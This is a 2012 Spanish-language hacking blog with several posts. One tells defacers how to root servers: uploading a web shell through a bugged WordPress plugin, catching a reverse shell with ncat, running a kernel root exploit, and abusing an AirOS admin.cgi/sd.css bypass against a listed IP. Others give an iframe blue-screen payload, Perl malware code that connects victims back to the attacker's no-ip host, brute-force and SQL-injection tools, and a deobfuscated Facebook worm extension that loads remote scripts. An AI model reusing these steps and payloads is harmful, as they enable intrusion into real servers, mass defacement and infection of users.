miércoles 25 de enero de 2012

Hattrick: Rooteando mas de 3 Servers en una Noche

Bueno esto que les voy a relatar ahora mismo es como rootearse fácilmente 3 servidores en una noche y uno que otro como para hacer mass (esto para los defacers):


Necesitamos una web vulnerable o en mi caso tengo una shell ya uploaded como la subí...


http://xxxx.com/ --> Web de un colegio... (es VPS la info del dominio dice comprado en el año 2003).

Buscando bien tienen un blog ya en desuso donde suben al parecer cosas de deporte... busco y tiene un complemento bugged de wordpres... su bug:

Remote File Uploading...

le pido a un colega una shell xD porque la verdad en mi pc ya no se encuentran muchas shells tengo que actualizar me da una bien interesante... luego le hago el upload... año del kernel 2007 lo que si tengo son root exploits, pongo en escucha mi nc...

ncat -v -l -p 6666 me conecto de manera reversa y listo a ejecutar...

./ex y listo estamos... ahora los otros dos está mas fácil aun vamos a usar este bug que me parecio interesantisimo:


http://186.38.2.70/login.cgi?uri=/ los AirOs tienen un bugsaso que segun yo es un bug lucrativo porque ya es muy notorio y practicamente es un backd00r...


cambias la ruta login.cgi por admin.cgi/sd.css y tienes una shell como esta:





para que mas diganme ustedes puden subir todo lo que quieran y tendrán servidores owned como quieran... encontrarlos es facilisisisisisisisimo yo encontré por lo menos 20 vulnerables en una noche... cuantos encuentran ustedes...



Saludos,
Dr.White
Publicado por en 17:11 3 comentarios
Etiquetas: , , ,

Provocando Pantalla Azul a travéz de Safari

Bueno para que mentir xD me dio pereza levantar una virtual y lo prové en mi maquina normal... Funciona Así...


Vas a tu hosting y subes un archivo llamado cualquiernombre.html y dentro le pones algo tan simple como esto:


<iframe height='18082563'></iframe>


no tube tiempo de probar con otras cantidades en el height pero si lo probe poner en la etiqueta img pero no funcionó... sirve para que? en realidad para nada mas que trollear salvo que ustedes le puedan dar un uso un poco mas util que yo :)



Datos del que lo encontró:

# Exploit Title: GdiDrawStream BSoD
# Date: 18-12-2011
# Author: webDEViL
# Version: Latest
# Tested on: Windows 7 x64 using Safari
# http://twitter.com/w3bd3vil


yo probé también en win 7 en 64 bits...


Saludos,
Dr.White
Publicado por en 17:01 0 comentarios
Etiquetas:

miércoles 11 de enero de 2012

Conexion Inversa Orientado a Malware

Escribo esto para explicarles masomenos como funcionan algunos malwares que se desarrollan ahora.

Lo que hacen es que las personas se conecten a la PC del Atacante y no El Atacante a la PC de la Víctima.


Set My PC:

Vamos a hacer lo siguiente, vamos a http://www.no-ip.com/ y nos vamos a registrar luego nos logueamos y vamos a ir a la pestaña Add a Host del Menu.

En El Host Name Ponemos SeguridadBlanca o bueno lo que deseen en este caso será SeguridadBlanca y al lado seleccionan lo que quieren yo escogí no-ip.org.

En la opcion de abajo donde dice: Host Type ponganlo en DNS Host (A) en la ip dejenla como está. Luego denle click al Boton Create Host.


Ahora Deben de Bajarse el Client de No-IP:

Download desde aquí yo en este caso estoy booteando mi win7 asi que me bajo la version para windows :)


Ahora me la bajo instalo todo y cuando abro me pide que me loguee, me logueo con mi cuenta de no-ip y aparecerá SeguridadBlanca.no-ip.org seleccionan el checkbox y ponen Save... luego les deben de salir tres checks:

Client ID
Updating
IP


si no te salen los tres checks es porque hay algo mal xD no funcionará muy bien si sales por proxy o estás en la oficina donde te bloquean cosas.


Ahora lo anterior de Setiar el no-ip es por dos motivos: El primero es porque nuestra ip cambia constantemente por lo menos en mi pais es así entonces para no tener que estar cambiando y cambiando pues usamos el no-ip que nos mantiene una ip seguridadblanca.no-ip.org y el otro motivo es para un tema de ocultar nuestra ip.


Ahora vamos a crear la conexion inversa.


use IO::Socket;
my $sock = new IO::Socket::INET (
PeerAddr => 'seguridadblanca.no-ip.org',
PeerPort => '90',
Proto => 'tcp',
);
die "No se creo el socket: $!\n" unless $sock;
print $sock "Soy tu Victima\n";
close($sock);


Bueno con eso se nos conecta la victima :)


aqui tambien tienen un chat en visual basic basado en sockets que pueden usar... adapten los sockets nomas bueno y ese code de perl es solo para hacer la conexion luego nuestro server debe correr en el puerto 90 y genial tenemos a las victimas conectadas a nosotros.



Saludos,
Camilo G.
Publicado por en 09:11 0 comentarios
Etiquetas: ,

Arachni Open Source Security Scanner

Arachni es un "nuevo" FrameWork Open Source Desarrollado en Ruby Para Analizar Bugs en Websites y asi ayudar a que tu web deje de ser vulnerable.

Su funcionamiento básicamente es que hace una especie de SiteMap y luego basado en las url obtenidas comienza a hacer un escaneo, la velocidad es normal ni rápido ni lento y no es tan noob friendly.


Corre en Linux y para Windows viene con librerias Cygwin.


Para ver mas información puedes consultar aquí.


Descarga:

Linux


Windows


Desde que me desperté lo anduve provando en localhost en linux, y funciona bien lo unico malo es que a veces como que se lentejea o si el bug hace redirección lo caga al scanner tambien.



Saludos,
Dr.White
Publicado por en 08:50 0 comentarios
Etiquetas: , , ,

domingo 8 de enero de 2012

Absinthe Blind SQL Injection Tool

Sinceramente me cuesta demaciado inyectar sql blind principalmente por que soy desesperado y eso de estar esperando no va conmigo, asi que bueno encontré esta tool en un foro y me parecio bien interesante la prové con una web de un amigo que tiene blind y la verdad es que el scanner es un poco lento pero funciona bien.


Caracteristicas:

- Totalmente automático, no encuentra la sqli tu se la debes dar.
- Inyecta MSsql, Postgres Sql y Oracle.
- Puedes editar el query.
- Soporta proxy.
- GUI.
- Algunas Más.


Mi Experiencia: Yo la prové en una blind en la web de un amigo, era MySql, aun no he tenido la oportunidad de provarlos con las otras bds pero en mysql corrió perfectamente.


Descarga


Informacion y Documentacion
Publicado por en 08:21 1 comentarios

Te quedó chico el hydra? Patator!

Patator es un nuevo brute forcer que basa sus características en los errores y complejidades que tienen herramientas como el hydra, el medusa, el brutus, el ncrack y muchas otras herramientas, quien una vez no quizo hacer una herramienta de bruteforce que se le adapte a sus necesidades... este tipo del Patator la ha desarrollado para ti.


Desventajas de algunas tools:

- Lentas.
- Dan Resultados Falsos.
- No Funcionan.
- Son muy simples.


Ventajas del Patator:

- Multithread (Es rápido)
- Sus Resultados realmente se basan en codigo.
- Muchos mas.


Sus Características:

ftp_login : Brute-force FTP
ssh_login : Brute-force SSH
telnet_login : Brute-force Telnet
smtp_login : Brute-force SMTP
smtp_vrfy : Enumerate valid users using the SMTP VRFY command
smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
http_fuzz : Brute-force HTTP/HTTPS
pop_passd : Brute-force poppassd (not POP3)
ldap_login : Brute-force LDAP
smb_login : Brute-force SMB
mssql_login : Brute-force MSSQL
oracle_login : Brute-force Oracle
mysql_login : Brute-force MySQL
pgsql_login : Brute-force PostgreSQL
vnc_login : Brute-force VNC
dns_forward : Forward lookup subdomains
dns_reverse : Reverse lookup subnets
snmp_login : Brute-force SNMPv1/2 and SNMPv3
unzip_pass : Brute-force the password of encrypted ZIP files
keystore_pass : Brute-force the password of Java keystore files


Las que he provado:

Brute-Force SSH
Brute-Force FTP
Brute-Force Telnet
Brute-Force Mysql


Lo que he notado de la tool, no es tanto que sea muy diferente a las otras, lo que he visto es que el código, escrito en python, está mas limpio y además, es más rapido que cualquier otro que haya provado.


Descarga
Mas Información



Saludos,
Dr.White
Publicado por en 07:18 1 comentarios
Etiquetas: ,

Nuevas Vibras para SeguridadBlanca

Bueno desde el día de hoy comenzaré a dedicarle mas tiempo al blog no solo para poner tutoriales hechos por mi sino también artículos de interes que sé que los podrán necesitar en algún momento.



Saludos,
Dr.White
Publicado por en 06:36 0 comentarios
Etiquetas:

miércoles 4 de enero de 2012

Sql Injection en ESET LATINOAMERICA

Bueno Resulta que hace tiempo yo trabajaba como freelance en una blog de malware me pagaban 100$ al mes ademas de una recompensa si es que uno de mis posts era el favorito del mes... y en una de las veces que decidi hacerle un escaneo con las manos como a mi me gusta yo no soy mucho de tools por que siempre la creatividad humana será mejor que la de un bot pero bueno analizo y encontré que habia una sqlinjection caletasa el cms que usabamos era un sistema de noticias no recuerdo cual tuneado por un programador de php que estaba mucho tiempo atras en el website la sqli estaba en el buscador... era simple tan facil como una comilla... el bug es parecidisimo al que encontré en ESET, un video donde les muestro que habia una sqli en eset, confirme que se podia hacer union y select. esto se puede reparar con un mysqlscapestrings a porcierto no le pongan muchos filtros a su web por que sino se van a ver puros backslash(\) por toda su web como la web de una empresa peruana que es tan insegura de como filtrar que filtra hasta los echo...





Saludos,
Dr.White
Publicado por en 17:25 2 comentarios
Etiquetas: ,

Analizando Gusanito Facebook

Un amigo me pega en el muro modelos se les sale la teta y que no se que y yo WTF!!???

Entro y me sale esta hermosura:




Lo Mas hermosos de esto es que el que lo programó fue bien astuto por que si es un plugin! pongo ver el codigo fuente y veo esto:


<center><p>Instala el Plugin para reproducir el video</p></center>



<div align="left" style="width:550px;height:437px;overflow:hidden;" id="videitos">

                   <center> <div id="liframe"><iframe id="change" width="500" src="http://xxxxxx.com/xxxx.html" height="300" scrolling="no" frameborder="0"></iframe></div></center>


Viendo la fuente del archivo xxxx.html encontré esto:

<script>

                var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;

                var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;

                function instalar(){

                    if (is_chrome){

                        window.open("http://xxxxx.com/plugin.crx");

                    } else if(is_firefox){

                        var params = {

                            "Youtube Extension": {

                                URL: "http://xxxxx.com/plugin.xpi",

                                toString: function () { return this.URL; }

                            }

                        };

                        InstallTrigger.install(params);

                    } else{

                         window.open("http://www.google.com/chrome/eula.html");

                    }

                }

             </script>


Quise ir un poco mas hayá y levanté mi máquina virtual... instalé mi google chrome y a infectarnos se ha dicho...


Luego fui a:

C:\Users\1337test\AppData\Local\Google\Chrome\User Data\Default\Extensions


Busqué la carpeta del plugin y encontré 5 Archivos:

go.js
icon16.png
icon48.png
icon128.png
manifest.json

En el go.js encontramos:

loadScript_YOU();

function loadScript_YOU() {

if ('https:' == document.location.protocol) return false;

var s = document.createElement('script');

s.setAttribute("type","text/javascript");

s.setAttribute("src", "http://xxxxxxx.com/script.js");

var head=document.getElementsByTagName("head")[0];

if( head==null) return false;

head.appendChild(s);

return true;

}




En el manifest:

{

   "content_scripts": [ {

      "all_frames": true,

      "js": [ "go.js" ],

      "matches": [ "\u003Call_urls\u003E" ]

   } ],

   "description": "Reproduce videos online alojados youtube, m\u00E1s r\u00E1pido y eficiente",

   "icons": {

      "128": "icon128.png",

      "16": "icon16.png",

      "48": "icon48.png"

   },

   "key": "xxxxxx",

   "name": "Extension YouTube",

   "permissions": [ "*://*/*" ],

   "update_url": "xxxxxxx",

   "version": "1.3.0"

}



Ahora lo importante en el go.js encontramos esto:

s.setAttribute("src", "http://xxxxxxx.com/script.js");


vamos a ver que hay dentro:

(Esto estaba encriptado ahora lo pongo desencriptado):

function addScript(_0xb530x2) {

    var _0xb530x3 = document['createElement']('script');

    _0xb530x3['setAttribute']('type', 'text/javascript');

    _0xb530x3['setAttribute']('src', _0xb530x2);

    var _0xb530x4 = document['getElementsByTagName']('script')[0];

    if (_0xb530x4 == null) {

        return false;

    };

    _0xb530x4['appendChild'](_0xb530x3);

    return true;

};

addScript('http://xxxxxxxxx.com/ex.js');


Ahora vamos a ver que hay en:

addScript('http://xxxxxxxxx.com/ex.js');


Y lo que habia era...

Bueno no voy a poner el codigo porque es su chamba pes su codigo ellos lo programaron está ofuscado aparte pero bueno lo que hace es por metodo post lo publica en el muro de tus amigos diciendo:

var comment = "Estas chichas se pasan!!! " + etiquetas;


Bueno como se desinfectan? vayan todo para atras.



Saludos,
Dr.White
Publicado por en 07:35 0 comentarios
Etiquetas: , ,
Suscribirse a: Entradas (Atom)